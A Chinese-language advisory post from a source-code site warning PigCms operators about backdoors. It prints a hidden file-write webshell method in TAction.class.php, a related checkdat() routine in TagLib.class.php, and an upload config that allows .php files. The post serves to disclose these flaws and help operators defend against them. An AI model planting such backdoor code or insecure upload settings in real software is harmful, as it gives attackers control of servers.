小猪常见后门和漏洞

作者 :
免费
  • 正文
  • 后门一、查找文件TAction.class.php
    public function test(){
    file_put_contents(base64_decode('dHBsL1VzZXIvZGVmYXVsdC9jb21tb24vaW1hZ2VzL2ZhY2UvMTA0LmdpZg=='),htmlspecialchars($_GET['n']));
    }*
    执行原理PHP图片注入木马//疑似后门,它生成文件tpl/User/default/common/images/face/104.gif
    这个文件虽然是104.gif,但它的内容却是由提交参数写入的。

    后门二、
    TagLib.class.php
    public function checkdat(){
    @$string=file_get_contents(base64_decode('dHBsL1VzZXIvZGVmYXVsdC9jb21tb24vaW1hZ2VzL2ZhY2UvMTA0LmdpZg=='));
    //if($this->think_encrypt($this->thinkphpgetmi())!=$string){eval(base64_decode("ZXhpdCgpOw=="));}
    }
    而且本页里$this->mat = $this->checkdat();
    \Lib\Driver\TagLib\TagLibCx.class.php
    $baiduccheckdata=$this->checkdat();
    这两个都只是赋值进去,并没有使用。
    本后门加密结果还是一句话注入后门程序
    漏洞一、查找文件upfile.php
    <?php return array (
    'up_size' => '2048', 'up_exts' => 'jpeg,jpg,png,php', 'up_path' => '/data/upload', 'connectnum' => '系统维护中......',);
    上面的'up_exts' => 'jpeg,jpg,png,php' 是指允许上传的文件类型,如果允许上传php,那么随便一个小白上传一个php木马到你的网站目录下,你的服务器权限就掉了。

    加外个人用阿里云,在云盾中删除了这个文件

    /PigCms/Lib/Action/User/BusinessflowerActlon.class.php

    也是后门文件

    基本所有版本内都有,各位运营者抓紧检查吧,别等被黑的时候不知道为什么。其他未发现的后门木马数量未知,自行检查全站吧。代码加密的就先解密检查。

    END
    如本资源侵犯了您的权益,请联系投诉邮箱admin@wmphp.com进行举报!我们将在收到邮件的1个小时内处理完毕。 本站仅为平台,发布的资源均为用户投稿或转载!所有资源仅供参考学习使用,请在下载后的24小时内删除,禁止商用! Wmphp.com(完美源码)助力正版,如您有自己的原创产品,可以联系客服投稿,代理出售! Wmphp.com(完美源码)客服QQ:136882447 Wmphp.com(完美源码)商务电话(仅对企业客户/个人用户):15120086569 (微信同步) 请注意:本站不提供任何免费的技术咨询服务,为了节约时间,下载前 请确认自己会技术
    完美源码 » 小猪常见后门和漏洞
    3488+

    本站勉强运行

    3665+

    用户总数

    690+

    资源总数

    0+

    今日更新

    2024-4-8

    最后更新时间